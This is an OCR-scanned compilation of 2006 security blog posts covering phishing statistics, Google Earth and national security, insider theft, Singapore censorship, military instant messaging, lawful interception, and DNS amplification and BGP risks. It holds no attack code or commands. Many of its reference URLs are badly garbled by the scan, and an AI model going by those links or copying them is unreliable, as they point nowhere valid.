sand Packets" will provide with much more fancy visualization concepts related to malware. 
Originally presented by [12]Gregory Conti, you can also download the [13]associated re- 
sources, and keep an eye on the [14]audio in case you didn’t attend the con. 


As far as [15]new media is concerned, I’m so impatient to witness more developments 
given how boring | find any of the browsers I’ve used so far - and there’re a lot of develop- 
ments going on as always! [16]Virtual worlds have the potential to change the face of the 
Web, the text/image based one the way we know it. 
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Remember how the federal agents were chatting face-in-face with the malicious attacker 
through the innovative and programmed for the masses browser, in [17]NetForce? [18]Hive7 
is the alternative in 2006, and if you spend some with it, you'll be impressed by its potential - 
say goodbye to the good old IRC? 


UPDATE : LinuxSecurity.com picked up the post "[19]Visualization in the Security and 
New Media world" 


More resources can also be found at: 


[20]CAIDA Visualization Tools 

[21]NAV - Network Analysis Visualization 

[22]Digital Genome Mapping - Advanced Binary Malware Analysis 

[23]A Visualization Methodology for Characterization of Network Scans 
[24]NVisionIP : An Interactive Network Flow Visualization Tool for Security 


[25]Exploring Three-dimensional Visualization of Intrusion Detection Alerts and Network 
Statistics 


[26]Attacking Information Visualization System Usability Overloading and Deceiving the 
Human 


[27]Security Event Visualization and Analysis - [28]courtesy of CoreLabs 
[29]A Visualization Paradigm for Network Intrusion Detection 


[30]FireViz: A Personal Firewall Visualizing Tool - the [31]FireViz project 
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2.3.19 March’s Security Streams (2006-03-31 15:13) 


A quick summary of March’s Security Streams ( [l]January, [2]February ). It was an unbe- 
lievably busy month, and while I’m multitasking and diversifying on a daily basis, I’m certain 
you've enjoyed this month’s streams, thanks for all the feedback you've been sending, it’s a 
small world if you just let yourself realize it! 


1. "[3]DVD of the (past) weekend" The Lawnmower man - God made him simple, Sci- 
ence made him God! 


2. "[4]February’s Security Streams" a summary of all the posts during February 


3. "[5]Anti Phishing toolbars - can you trust them?" Recent phishing trends and the use- 
fulness of anti-phishing toolbars discussed - at the bottom line the complexity of the relatively 
simple concepts seems to ruin the whole effect, but wish phishing was that simple! 


4. "[6]Data mining, terrorism and security" Commentary on NSA’s data mining interests 
and the still active Total Information Awareness program. Data mining is a very popular trend 
towards fighting terrorism - and too ambitious, whereas storage of someone’s life in a digital 
form is getting even cheaper, making sense of it all in a timely fashion still remains the biggest 
problem 


5. "[7]5 things Microsoft can do to secure the Internet, and why it wouldn’t?" That’s the 
second most popular post this month, right after "[8]Where’s my Oday, please?". Basically, 
it gives an overview of key points Microsoft can execute in order to secure the insecure by 
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default Internet, and why it wouldn’t. The post isn’t biased at all, it’s just the fact that their 
QA procedures open up the most easily exploited windows of vulnerability ever - client side 
attacks on the IE browser. As a matter of fact, Fortune’s latest issue has interviewed Steve 
Balmer in their QuestionAuthority column - important fact MS’s investors should keep in mind 
in respect to the future competitiveness of the company is how Balmer’s kids are forbidden 
from using iPods and Google, which is very sad 


6. "[9]The Future of Privacy = don’t over-empower the watchers!" We sacrifice our pri- 
vacy, or have it abused on a daily basis in order to function in today’s digital society, whereas 
there’s nothing groundbreaking as a future trend besides giving too much power to the 
Watchers ensuring our "[10]Security vs Privacy or what’s left left from it" 


7. "[11]Where’s my Oday, please?" Introducing the International Exploits Shop and pro- 
viding relevant comments on the current state of the market for software vulnerabilities - | 
wonder are the informediaries already talking/realizing the potential for an Obay auction model 
as given the growing number of both sellers and buyers, such a model would sooner or later 
emerge. If it does not, you will continue comming across or digging for sites offering fresh 
Oday exploits that have the capacity to keep the media echo for yet another several weeks. 
CERT is totally out of the question, end users doesn’t know what is going on, and everyone is 
trying to cash for being a vulnerability digger, not a researcher! 


8. "[12]DVD of the Weekend - The Immortals" Forget entertainment and enjoy this vi- 
sionary adaptation of Enki Bilal’s Nikopol Trilogy 


9. "[13]Security vs Privacy or what’s left from it" Sacrifices drive success to a certain 
extend, whereas Security shouldn’t be sacrifices for Privacy, at any cost! 
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10. "[14]Old physical security threats still working" The old physical security trick of 
abusing a CD/DVD’s autostart feature by installing malware on the PC seems to be fully 
working even today, which isn’t a big suprise at all. Physical security threats have greatly 
change on the other hand as employers themselves have realized the possibility for [L5]insider 
abuse. And while you might be a little more secure from threats like these, at the end of they 
day you'll probably have your boss snooping around to find out where’s that abnormal P2P 
traffic coming from :) 


11. "[16]Getting paid for getting hacked" Cyber insurance seems very attractive, and it 
really is, have your company’s databases stolen, you’ll get premium for it, receive a DDoS 
extortion letter, get it paid with a smile on the [17]herder’s face. Moreover, considering the big 
picture, | feel you’d rather have a security vendor take care of the consultation process, with 
the idea that their revenues will be at least spend on R &D security investments compared to 
an insurance company, or that’s how at least | see it 


12."[18]Successful" Communication" Dilbert rocks my world, my most important point on 
commercializing vulnerability research is how it’s happening in exactly the worst moment 
ever. The immature concept of reporting vulnerabilities and the economics of the process 
itself didn’t really need money in between. In the eyes of these vendors, which as a matter 
of fact go through my posts, | am a naysayer, and I’m not. I’m just trying to keep up a 
constructive discussion, and the results of it will soon be posted in here 


13. "[19]Weekend Vibes - Psychedelic/Goa Trance" My music evolution went through 
Rainbow, Deep Purple, started getting "hard" with Metallica, Off Spring, Guano Apes, to 
today’s mix of alternative, classic rock and psychedelic/goa trance. No matter how your taste 
changes, don’t forget where you’ve started from 


14. "[20]ls a Space Warfare arms race really coming?" Yes, it is and the more aware- 
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ness is build on this issue, the higher the public discussion and hopefully, transparency 
of the activities. | find Secrecy a double-edged sword for an intelligence/military agency, 
as sometimes you just need to hear an average person’s opinion on your megalomaniac 
ambitions. But given you are sincerelly backed up by a couple of billion dollars budget, your 
purchasing power becomes a bad habit of yours 


15. "[21]The Practical Complexities of Adware Advertising" Advertising players simply 
cannot periodically evaluate the [22]maliciousness of their members as they will lose the 
scale necessary to keep the revenues growing. The participants on the other hand, are indeed 
getting ads and paid for displaying them, and of course, questionable content from time to 
time. Seaching around the [23]IAB’s site however, you wouldn’t find any info on the idea of 
spyware/adware in today’s booming online advertising market 


16."[24]Privacy issues related to mobile and wireless Internet access" Both end users 
and companies are "going mobile" and thefore the possibilities for privacy violations/physical 
security location are getting even more relevant 


17."(25]DVD of the Weekend - War Games" A little something on the movie and the re- 
cent "yet another Microsoft IE Oday" in the wild case 


18."[26]Are cyber criminals or bureaucrats the industry’s top performer?" Paper tigers 
have an unprecedented effect on the loss of productivity and a society’s progress - the worst 
thing is how much they actually enjoy it! A very resourceful post that covers some important 
issues to keep in mind 
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19."[27]Visualization in the Security and New Media world" or why a picture is worth a 
thousand packets? 


UPDATE : Here are the unique and returning visitor graphs for the last several months, 
the outcome? Learn to understand your readers and how to retain them, thank you all for 
expressing your comments, contacting me, and keeping the discussion going! 


Technorati tags : 


[28]Security, [29]Information Security 


kp: //Adanchev blogspot. con/2006/01/ janvarys-security-streans ‘hal 
_ http: / /Adanchev. blogspot .con/2006/02/tobruatye-security-streans.hel 
| http: / /Adanchev. blogspot .con/2006/03/avdof~past-veekend hia 

_hetp://ddanchev. blogspot .con/2006/02/tebruarye~security-streans hal 


1 

2 

3 

4 

5. http: //ddanchev. blogspot .com/2006/03/anti-phishing-toolbars-can-you-trust.htm 
6. http: //ddanchev. blogspot .com/2006/03/data-mining-terrorism-and-security.htm 
7. http: //ddanchev. blogspot .com/2006/03/5-things-microsoft-can-do-to-secure.htm 
8 
9 


. http: //ddanchev. blogspot .com/2006/03/wheres-my-Oday-please.htm 
. http: //ddanchev. blogspot .com/2006/03/future-of-privacy-dont-over-empower .htm 


. http: //ddanchev. blogspot .com/2006/03/security-vs-privacy-or-whats-left-from. html 


11. http://ddanchev.blogspot .com/2006/03/wheres-my-Oday-please. htm 
12. http: //ddanchev.blogspot .com/2006/03/dvd-of-weekend-immortals.htm 


. http: //ddanchev. blogspot .com/2006/03/security-vs-privacy-or-whats-left-from. html 


14. http: //ddanchev.blogspot .com/2006/03/old-physical-security-threats-still.htm 


. http: //ddanchev.blogspot.com/2005/12/insiders- insights-trends-and-possible. htm 


. http: //ddanchev.blogspot .com/2006/03/getting-paid-for-getting-hacked_17.htm 


17. http: //ddanchev.blogspot.com/2006/01/what-are-botnet-herds-up-to.htm 


. http: //ddanchev. blogspot . com/2006/01/what-are-botnet-herds-up-to. html 
_netp:/ /ddanchev blogspot .con/2006/09/successful-conmunicat ion. héal 
19, rtp: //aanchev blogspot  con/2006/08/seekend-vibes-psychedelicgoa- trance, hall 
_netp://adanchev. blogspot .con/2006/03/s~space-wartare-amns-race-really tl 
| http://adanchey.blogepot .con/2006/03/practical- complexities-of-advare. heal 
22. jeep: //ddanchev. blogspot. cot /2006/02/Lodk-whos- gonta-caah~for~evaluating, heal 
23. http://www. iab.net/ 


. http: //ddanchev. blogspot . com/2006/03/privacy-issues-related-to-mobile-and. htm 
25. http: //ddanchev. blogspot . com/2006/03/dvd-of-weekend-war-games. htm 
26. http: //ddanchev. blogspot .com/2006/03/are-cyber-criminals-or-bureaucrats .htm 


. http: //ddanchev. blogspot. com/2006/03/visualization-in-security-and-new. html 


344 


28. http://technorati.com/tag/Securit 
29. http://technorati.com/tag/InformationtSecurit 


2.4 April 


2.4.1 Wanna get yourself a portable Enigma encryption machine? (2006-04-03 13:12) 


Hurry up, you still have 5 hours to participate in the [1l]sale at Ebay as the BetaNews [2]re- 
ported "eBay has long been a purveyor of the unusual and the unique, but it’s not often an 
authentic piece of tech history captures as much attention as the Enigma 3 portable cipher 
machine that has racked up bids of almost 16,000 euros. The Enigma device was used 
extensively by Nazi Germany during World War II." 


[3]The Enigma machine was a key success factor for the Germans during WWII, until of 
course its messages started getting deciphered, it’s great someone managed to preserve 
and resell one. Today’s situation is entirely different, namely an average Internet user can 
easily encrypt data achieving military standards with the use of public tools, where [4]Phil 
Zimmerman’s PGP has been cause troubles for governments across the world since its release. 


However, what the majority of end users don’t realize is the how the keys lenght and 
the passphrase’s quality means totally nothing when [5]law enforcement is sometimes 
empowered to use spyware, and that [6]quantum cryptography is also subject to attacks. 
Client side attacks and social engineering ones don’t take into consideration any key lenght - 
just naivety. In one of my previous posts "[7]Get the chance to crack unbroken Nazi Enigma 
ciphers" 


| mentioned about the existence of a distributed project to crack unroken nazi ciphers 
you can freely participate into. Being a total paranoid in respect to my favorite SetiATHome, 
you should also consider the possibility of a [8]SETI] Hacker - which partly happened in 
[9]Contact in case you reckon. 
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2.4.2. The "threat" by Google Earth has just vanished in the air (2006-04-05 17:39) 


Or has it actually? In one of my previous posts "[1]Security quotes : a FSB (successor to the 
KGB) analyst on Google Earth" | mentioned the usefulness of [2]Google Earth by the general 
public, and the possibility to assist terrorists. The most popular argument on how useless the 
publicly available satellite imagery is that it doesn’t provide a high-resolution images, and 
recent data as well - that’s of course unless you don’t [3]request [4]one, but isn’t it bothering 
you that here we have a street-side drive-by POC? 


The recently introduced [5]Windows Live Local Street-Side Drive-by ([6]A9’s maps have 
been around for quite a while), is setting a new benchmark for interactive [7]OSINT - if any 
as this is also a [8]privacy violation that can be compared with efforts like [9]these if it was in 
real-time. Having had several conversations with a friend that’s way too much into satellite 
imagery than me, I've realized that starting from the basic fact of targeting a well known or 
a [10]movie-plot location doesn’t really requires satellite imagery. | find that today’s sources 
basically provoke the imagination and the self-confidence - and hopefully nothing more! 


There have been [11]numerous articles on the threat posed by Google Earth, and [12]lIn- 
dia seems to be the most concerned country about this for the time being : 


34 


(2) 


"Chief of the Indian Army General J.J. Singh warns that Google Earth could endanger na- 
tional security by providing high resolution photographs of strategic defense facilities. The 
software could prove especially useful to countries that do not have their own satellite capa- 
bilities. Singh called Google Earth a shared concern for all countries, requiring all countries to 
cooperate to address the issue. Indian President APJ Abdul Kalam has also expressed concerns 
over Google Earth and national security." 


You can spend hours counting the cars in front of NSA’s parking lot through public satel- 
lite imagery resources, still you would never get to see what’s going on in there, | guess 
things have greatly changed since the days when tourists sent over the USSR, or exactly the 
opposite, to the U.S, would try to get hold of as many [13]maps as possible finish the puzzle. 


In some of my previous posts on [14]Cyberterrorism, | said that terrorists are not rocket 
scientists until we make them feel so, and I’m still sticking to this statement, what about you? 
As a matter of fact, Schneier is inviting everyone to participate in the [15]Movie-Plot Threat 
contest - stuff like [16]terrorist EMP warfare, [17]Nuclear truck bombs (the same story from 3 
[18]years ago), and other science fiction scenarios worth keeping an eye on. 


Terrorism is a profitable paranoia these days, that’s constantly fuelling further growth in 
defense and intelligence spending, as satellite imagery is promoted for the bust of [19]Bin 
Laden, whereas their [20]infrastructure seems to pretty safe, isn’t it? (More photos, [21]1, 
[22]2, [23]3, [24]4, [25]5, [26]6) I’d rather we have known parties as an adversary, the 
way it used to be during the [27]Cold War, whose competition [28]sent us in Space, and 
[29]landed us on [30]the Moon , instead of seeing terrorists everywhere and missing the 
[31]big opportunity. 
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2.4.3 Insider fined $870 (2006-04-05 18:22) 


[1]Insiders still remain an [2]unresolved issue, where the biggest trade-off is the loss of 
productivity and trust in the organizational culture. According to the Sydney Morning Herald : 
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"A court in Guangzhou, capital of the southern Chinese province of Guangdong, has up- 
held a lower court’s guilty verdict against Yan Yifan for selling stolen passwords and virtual 
goods related to the online game "Da Xihua Xiyou.The court upheld a $870 US fine, arguing 
that victimized players had spent time, energy, and money to obtain the digital items Yan sold. 
Yan stole the players’ information while an employee for NetEase.com, the company behind 
the game." 


So, it’s not just [3]Odays, [4]Ebay/PayPal accounts, and [5]spyware market entry posi- 
tions for sale - but [6]virtual world goods as well. 


While it’s not a [7]top espionage [8]case, or one compared to the [9]recent arrest of 
"two men, identified as Lee and Chang, on charges of industrial espionage for downloading 
advanced mobile phone designs from employer Samsung for sale to a major telecommunica- 
tions firm in Kazakhstan", insiders still represent a growing trend that according to the most 
recent [10]FBI’s 2005 Computer Crime Survey, cost businesess $6,856,450. 


Then again, failing to [1l]Jadequatly quantify the costs may either fail to assess the situ- 
ation, or twist the results based on unmateliazed, but expected sales, as according to the 
company, "Samsung could have suffered losses of $1.3 billion US had the sale been com- 
pleted." Trust is vital, and so is the confidence in Samsung’s business case. 
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2.4.4 Securing political investments through censorship (2006-04-05 18:59) 


[1]l try to extensively blog on various [2]privacy and [3]lnternet censorship related issues 
affecting different parts of the world, or provide comments on the big picture they way | see it. 


Spending millions - [4]6 million euro here, and | guess you also wouldn’t let someone 
spread the word whether the cover is fancy enough for a vote or not - on [5]political cam- 
paigns to directly or indirectly influence the outcome of an election, is a common practice 
these days. Whereas, trying to build a wall around a government’s practices is like having a 
tidal wave of comments smashing it. | recently came across the following [6]article : " 


"Singapore has reminded its citizens that web users who post commentary on upcoming 
elections could face prosecution. Election commentary is tightly controlled under Singaporean 
law; independent bloggers may comment on the election, but must register their site with the 
Media Development Authority (MDA)." 


I’m so not into politics - and try not to - but threatening with prosecution on commen- 
tary, registering users, while not first "introducing yourself" as "During the November 2001 
elections, Singapore’s political parties limited their use of the Internet to posting schedules 
and candidate backgrounds." isn’t the smartest long-term political strategy ever, don’t you 
think? 
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More resources on the state of censorship in Singapore worth checking out are : 


[7 


— 


[8]lInternet Filtering in Singapore in 2004- 2005: A Country Study 
[9]JEFF "Censorship - Singapore" Archive 

[10]Censorship in Singapore 

[11]To Net or Not to Net: Singapore’s Regulation of the Internet 
[12]Censorship Review Committee 2002/2003 


[13]The Internet and Political Control in Singapore 
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2.4.5 Heading in the opposite direction (2006-04-05 19:51) 


Just one day before [1]April 1st 2006 | came across this [2]article : 


"German retail banker Postbank will begin using electronic signatures on e-mails to its 
customers to help protect them from phishing attacks." 


Catching up with the phishers seems to be a very worrisome future strategy. Electronic 
Signatures by themselves are rarely checked by anyone, and many more attack vectors are 
making the idea of this totally irrelevant. Moreover, a great research "[3]Why phishing works" 
was recently released and it basically outlines basic facts such as how end users doesn’t pay 
attention to security checks, if there’s a definition of such given the attack vectors phishers 
have started using recently. In some of my previous posts "[4]Security threats to consider 
when doing E-Banking", and "[5]JAnti Phishing toolbars - can you trust them?" | mentioned 
many other problems related to this bigger than it seems problem, what you should also keep 
an eye on is the [6]good old ATM scam | hope you are aware of. 


Postbank is [7]loften targeted by phishers, still, the best protection is the level of [8]se- 
curity awareness stated in here : 


"Phishing attacks have led 80 % of Germans to distrust banking related e-mails, accord- 
ing to TNS Infratest." Moreover, "Postbank’s electronic signature service isn’t possible with 
web-based e-mail services provided by local Internet service providers such as GMX GmbH 
and Freenet.de AG, according to Ebert. One exception is Web.de" 
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Thankfully, but that’s when you are going in exactly the opposite direction than your 
customers are, while trying to estalibish reputable bank2customer relationship over email. 
Listen your customers first, and follow the trends, and do not try to use the most popular 
dissemination vector as a future communication one. 


Something else in respect to recent phishing statistics is the key summary points of the 
recently released, [9]AntiPhishingGroup’s Report for January, 2006 report : 


¢ Number of unique phishing reports received in January: 17,877 

¢ Number of unique phishing sites received in January: 9715 

¢ Number of brands hijacked by phishing campaigns in January: 101 

¢ Number of brands comprising the top 80 % of phishing campaigns in January: 6 
* Country hosting the most phishing websites in January: United States 

* Contain some form of target name in URL: 45 % 

¢ No hostname just IP address: 30 % 

¢ Percentage of sites not using port 80: 8 % 

¢ Average time online for site: 5.0 days 

¢ Longest time online for site: 31 days 


| feel there’s a lot more to expect than trying to re-establish the communication over a 
broken channel, as far as E-banking is concerned. 


More resources you might be interested in taking a look at are: 
[10]Vulnerability of First-Generation Digital Certificates and Potential for Phishing Attacks 
[11]Netcraft: More than 450 Phishing Attacks Used SSL in 2005 


[12]SSL’s Credibility as Phishing Defense Is Tested 
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[13]Rootkit Pharming 

[14]The future of Phishing 

[15]Something is Phishy here... 

[16]Phishing Site Using Valid SSL Certificates 


[17]Thoughts on Using SSL/TLS Certificates as the Solution to Phishing 
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2.4.6 "IM me" a strike order (2006-04-12 12:35) 


[1]In my previous post "[2]What’s the potential of the IM security market? Symantec thinks 
big" | commented on various IM market security trends, namely [3]Symantec’s acquisition of 
IMLogic. It’s also worth mentioning how a market leader security vendor was able to quickly 
capitalize on the growing IM market, and turn the acquisition into a valuable solution on the 
giant’s [4]portfolio of solutions. What’s also worth mentioning is the military interest in instant 
communications in today’s [5]network centric warfare powered battlefield. Today | across an 
interesting [6]recent development, namely that : 
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"The US Army, Navy, and Air Force have deployed protected interoperable instant mes- 
saging (IM) systems among the threebranches. Army Knowledge Online, Navy Knowledge 
Online, and theAir Force’s Knowledge Management Portal built the IM systems for 3.5 million 
users from Bantu’s Inter-domain Messaging (IDM)gateway, a policy-driven with role-based 
access controls. The system will carry messages over sensitive and secret networks, and can 
populate a user’s contact list with appropriate officials in the chain of command. Intelligence 
agencies will hook into the system to work with the military, and the Department of Homeland 
Security is also interested in the IM system." 


[7] 


[8]Flexible military communications have always been of great importance, and flexibility here 
stands for securely communicating over insecure channels - IP based communications. While 
you might have not heard of [9]Bantu before, to me their [10]real-time network for interagency 
communication sounds more like a security through obscurity approach - temporary gain and 
possible long term disaster. 


Could the instant communication finally solve the Intelligence Community’s [11]informa- 
tion sharing troubles? 


In a relatively [12]recent report | came across, "a survey was hosted on the Secret Inter- 
net Protocol Router Network ([13]SIPRNET) so that personnel could respond to the survey 
from the convenience and privacy of their own workstations." in order to measure the commu- 
nication requirements of various staff members, some of the findings worth mentioning : 


[14]MS Chat was used by at least 50 % of all command groups 


- 100 % of Afloat Staffs, 86 % of Carriers, 78 % of Cruisers & Destroyers, 50 % of Sup- 
port 


[15]XIRCON was used by 28 % - 50 % of command groups 
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- 50 % of Support, 41 % of Carriers, 32 % of Cruisers & Destroyers, 28 % of Afloat Staffs 
[16]Lotus Sametime was used by 0 - 44 % of command groups 


- 44 % of Afloat Staffs, 16 % of Cruisers & Destroyers, 10 % of Carriers, 0 % of Sup- 
port 


[17]mIRC was used by 13 - 33 % of command groups 


- 33 % of Support, 23 % of Carriers, 22 % of Cruisers & Destroyers, 13 % of Afloat Staffs 


Lotus Sametime and mIRC seem to be only survirors, still the implications of using the 
above in respect to the powerful execution of various network centric warfare events, would 
definitely raise not just my eyebrows for sure. [18]Two years ago, led by IMLogic a consortium 
on IM threats was established, the [19]IM Threat Center, an indispensable early warning 
system for anything related to IM malware. 


Would age-old IM threats re-introduce themselves on military networks like never before? 
Whatever the outcome, information overload wouldn’t necessarily be solved through instant 
communications, but in a combination with powerful [20]visualization [21]concepts as well. 


The post recently appeared at LinuxSecurity.com "[22]IM me" a strike order" 
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2.4.7 Catching up on how to lawfully intercept in the digital era (2006-04-12 19:17) 


In one of my previous posts "[1]A top level espionage case in Greece" | blogged about two 
cases of unlawful interception - good old espionage practices in modern environment. What’s 
also worth mentioning is the rush for [2]lawful interception in the post 9/11 world, that is 
[3]free spirits get detained for singing or being [4]nerds, activities you can hardly [5]datamine 
at the bottom line, and then again, [6]so what? 


Last month, Australia extended its phone-tap laws to e-mails and SMS, OMG, [7]good 
morning Vietnam. An excerpt from the [8]news item : 


"Australia has passed new laws that would allow police to intercept phone calls, e-mails, 
and text messages of people who are just suspected of a crime. Attorney-General Philip 
Ruddock says the new laws account for challenges posed by technology; in December 2005, 
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Middle Eastern and white supremacist youth used SMS messages to coordinate during race 
riots. However, civil liberties groups warn that the laws could allow police to target the privi- 
leged conversations of lawyers and journalists or to target innocent people for investigation. 
Australia has been tightening security laws since the September 11, 2001, terrorist attacks in 
the US." 


Whether compliance, or new [9]revenue sources from a telecom/network giant’s point of 
view, [1O0]lawful interception has always been happening. A [11]single [12]vendor’s [13]box 
can [14]easily [15]monitor over 30,000 DSL connections, and while the problem still remains 
processing power and [16]decentralized/encrypted [17]communications, [18]steganography 
as a concept has always been the biggest downsize of any approach from my point of view. 


At the bottom line it would eventually provide the [L9]ECHELON’s community with more 
information to take hold of, whereas retaining or trying to data mine it still remains an abstract 
concept whose only justification has been the contradictive [20]Able Danger scenario. It is 
my opinion that erasing terrabytes of intelligence information on a terrorist group is a pure 
science-fiction scenario, they way there’s a desperate need for a clear [21]ROI in respect to 
CCTV cameras. 


Don’t [22]over-empower the watchers for [23]the sake of your Security, or you'll end up 
with a false feeling of it. 


More resources on surveillance and lawful interception worth going through are : 


[24]International Campaign Against Mass Surveillance 


[25]Development of surveillance technology and risk of abuse of economic information 
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[26]Legal Analysis of the NSA Domestic Surveillance Program 

[27]Wiretapping, FISA, and the NSA 

[28]Can the government track your cell phone’s location without probable cause? 
[29]Attack Detection Methods for All-Optical Networks 

[30]2006 = 1984? 

[31]Privacy issues related to mobile and wireless Internet access 

[32]Lawful Interception of the Internet 

[33]Using MAC Addresses in the Lawful Interception of IP Traffic 

[34]Open Source Intelligence (OSINT) 


[35]Making Intelligence Accountable: Legal Standards and Best Practice for Oversight of 
Intelligence Agencies 


[36]What is Project ECHELON? 

[37]Surveillance and Society Journal 

[38]Cybercrime in New Network Ecosystem: vulnerabilities and new forensic capabilities 
[39]Strategies for Lawful Intercept 

[40]Summary - Lawful Interception plugtest 


[41]Whistle-Blower Outs NSA Spy Room 
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2.4.8 On the Insecurities of the Internet (2006-04-13 12:04) 


Among the most popular [1]stereotypes related to Cyberterrorism, is that of terrorists [2]shut- 
ting down the Internet, or to put it in another way, denying access to the desperse and 
decentralized Internet infrastructure by attacking the [3]lnternet’s root servers the way it 
happened back in [4]2002 - knowing Slashdot’s IP in such a situation will come as a handy 
nerd’s habit for sure. Outages like these would eventually result in a [5]butterfly effect, such 
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as direct monetary losses and confidence in the today’s E-commerce world. 


In my previous "[6]How to secure the Internet" | commented on the [7]U.S’s National 
Strategy to Security Cyberspace, moreover, | pointed out some issues to consider in respect 
to the [8]monoculture that’s affecting the entire population. While today’s threatscape is 
constantly changing, it still points out key points points such as : 


- Improve the Security and Resilience of Key Internet Protocols 


"The Internet is currently based on Internet Protocol version 4 (IPv4). Some organiza- 
tions and countries are moving to an updated version of the protocol, version 6 (IPv6). IPv6é 
offers several advantages over IPv4. In addition to offering a vast amount of addresses, it 
provides for improved security features, including attribution and native IP security (IPSEC), as 
well as enabling new applications and capabilities. Some countries are moving aggressively to 
adopt IPv6. Japan has committed to a fully IPv6 based infrastructure by 2005. The European 
Union has initiated steps to move to IPv6. China is also considering early adoption of the 
protocol." 


In my previous "[9]The current state of IP Spoofing" post, | mentioned that if you can 
spoof there’s no accoutability, and you can even get DDoSed by gary7.nsa.gov. But until then 
we would have to live with the current situation, or keep building awareness on the issue of 
course. 


- Secure the Domain Name System 


"DNS serves as the central database that helps route information throughout the Inter- 
net. The ability to route information can be disrupted when the databases cannot be accessed 
or updated or when they have been corrupted. Attackers can disrupt the DNS by flooding 
the system with information or requests or by gaining access to the system and corrupting or 
destroying the information that it contains." 


361 


During March, Randal Vaughn and Gadi Evron released a practical study entitled "[LO0]DNS 
Amplification Attacks" pointing out that : 


"Our study is based on packet captures and logs from attacks reported to have a vol- 
ume of 2.8Gbps. We study this data in order to further understand the basics of the reported 
recursive name server amplification attacks which are also known as DNS amplification or 
DNS reflector attacks. One of the networks under attack, Sharktech, indicated some attacks 
have reached as high as 10Gbps and used as many as 140,000 exploited name servers. In 
addition to the increase in the response packet size, the large UDP packets create IP protocol 
fragments. Several other responses also contribute to the overall effectiveness of these 
attacks." 


It feels like a deja vu moment compared to Mixter’s release of his award-winning "[11]Protect- 
ing against the unknown" research and the emergence of DDoS attacks(read the [12]complete 
story, and keep in mind that it’s wasn’t [13]iDefense, but [14]PacketStormSecurity offering 
$10k rewards back in 2000). VeriSign indeed detailed [15]massive denial-of service attack, 
and [16]Slashdot also picked up the story. Most importantly, the event also attracted the 
[17]U.S government’s attention, but what you should also keep in mind is that : 


"In order to create an 8Gbps attack using carefully crafted zones, you need no more 
than 200 home PCs on basic DSL lines," Joffe said. That math assumes about 200 bots eating 
up a full 512Kbps connection with lots of 60-byte DNS queries, each of which is amplified 
70x into a 4,200-byte reply against the attacker’s target. To put that in perspective, Russian 
hacking crews advertise that they will place the malware of your choice on 1,000 bots for a 
mere $25, according to the Internet Storm Center." 
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No [18]Oday necessary, but [19]DDoS on demand/hire, [20]and [21]renting [22]botnets 
are the practices worth mentioning the way | pointed them out in my [23]Future trends of 
malware research. 


-Border Gateway Protocol 


"Of the many routing protocols in use within the Internet, the Border Gateway Protocol 
(BGP) is at greatest risk of being the target of attacks designed to disrupt or degrade service 
on a large scale. BGP is used to interconnect the thousands of networks that make up the 
Internet. It allows routing information to be exchanged between networks that may have 
separate administrators, administrative policies, or protocols." 


Interdomain routing communications are like empowering assembly line workers with 
the ability to stop the line at anytime, or have a claim on it, a tricky option sometimes. A 
recently released research(2005) "[24]A Survey of BGP Security" points out the bottom line 
these days: 


"We centrally note that no current solution has yet found an adequate balance between 
comprehensive security and deployment cost." Still, [25]IETF’s Routing Protocol Security 
Requirements (rpsec) are worth the read. 


What | truly hope, is that any of these guidelines wouldn’t end up on a [26]paper tiger’s 
desk for years to come, namely they would eventually get implemented and Internet2 would 
end up dealing with a more advanced set of security problems compared to the [27]current 
[28]ones. 
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My point is that, while only the [29]paranoid [30]survive, seeing [31]ghosts here and 
there is like totally missing the big picture - Richard Clarke for instance once [32]said that 
"|f there’s a major devastating cyberspace security attack, the Congress will slam regulation 
on the industry faster than anything you can imagine. So, it’s in the industry’s best interest 
to get the job done right before something happens." But when, and how it would affect 
the commercial side of the question, that is how visionary are the vendors themselves to 
anticipate the future in here? 


No one would want to shut down the Internet as terrorists are actively using it for pro- 
paganda, communication, and open source intelligence. Still, the [33]deceptive PSYOPS 
initiated by terrorist sympathizers or [34]wannabe such is what will continue to hit the 
deadlines - just don’t miss the big picture! 


UPDATE : The post just appeared at LinuxSecurity.com "[35]On the Insecurities of the In- 
ternet" 
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27. http://ddanchev.blogspot .com/2006/01/how-to-secure-internet .htm 


ttp://ddanchev. blogspot . com/2006/03/5-things-microsoft-can-do-to-secure.htm 
29. http://www. fas.org/irp/congress/2005_hr/hhrg109-58. html 
30. http://www. intel .com/pressroom/kits/bios/grove/paranoid. ht 


31. http://www. theregister.co.uk/2005/02/24/ibm_lenovo_spooks/ 

32. http://www. pbs .org/wgbh/pages/frontline/shows/cyberwar/interviews/clarke.htm 
33. http://ddanchev. blogspot .com/2006/02/hacktivism-tensions .htm 

34. http://www.washingtonpost .com/wp-dyn/content/article/2006/03/25/AR2006032500020. htm 
35. http://www. linuxsecurity.com/content/view/122340/65/ 

36. http://technorati.com/tag/Securit 

37. http://technorati.com/tag/InformationtSecurit 

38. http://technorati.com/tag/Internet 

39. http://technorati.com/tag/Internet2 

40. http://technorati.com/tag/DDo 

41. http://technorati.com/tag/Networking 

42. http://technorati.com/tag/IPv6 

43. http://technorati.com/tag/VeriSig 


2.4.9 Distributed cracking of a utopian mystery code (2006-04-13 15:09) 


If you have missed the opportunity to [1]buy yourself a portable Enigma encryption machine, 
or didn’t know you could devote some of your CPU power while trying to [2]crack unbroken 
Nazi Enigma ciphers, now is the time to consider another [3]distributed computing cracking 
initiative | just came across to - "[4]Assault on the Thirteenth Labour", part of the utopian 
[5]Perplex City alternate reality game. 


More on the [6]story [7]itself : 
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"The story centers on a fictional metropolis known as Perplex City. The Receda Cube, a 
priceless scientific and spiritual artefact, has been stolen and buried somewhere on Earth, 
and the game Offers a real-life $200,000 reward to whoever can find it." 


As a matter of fact, ever heard [8]of [9]Hive7? This is where the future is going, as | 
think [10]virtual worlds intrigues result in a more quality real life, don’t they? Still, it can 
also result in security problems with [11]stolen virtual goods. The trend, given the popularity 
of these, will continue to emerge - people, both rich and poor are putting hard cash into 
[12]virtual properties and [13]DoS attacks and [14]phishing practices are already gaining 
popularity as well. 


Technorati tags: 


[15]Security, [16]Cryptography, [17]Perplex City, [18]Virtual Worlds, [19]Distributed, [20]New 
Media 


. http: //ddanchev. blogspot .com/2006/04/wanna-get- yourself-portable-enigma.htm 
. http: //ddanchev. blogspot .com/2006/02/get-chance-to-crack-unbroken-nazi.htm 


ttp://en.wikipedia.org/wiki/List_of_distributed_computing projects 


_ http: //homepage .nt1world.com/t .kirman/PXC/thirteenth_labour . htm 
_ http: //www.perplexcity.com/ 

. http: //story.perplexcity . com/ 

_ http: //en. wikipedia. org/wiki/Perplex_City 


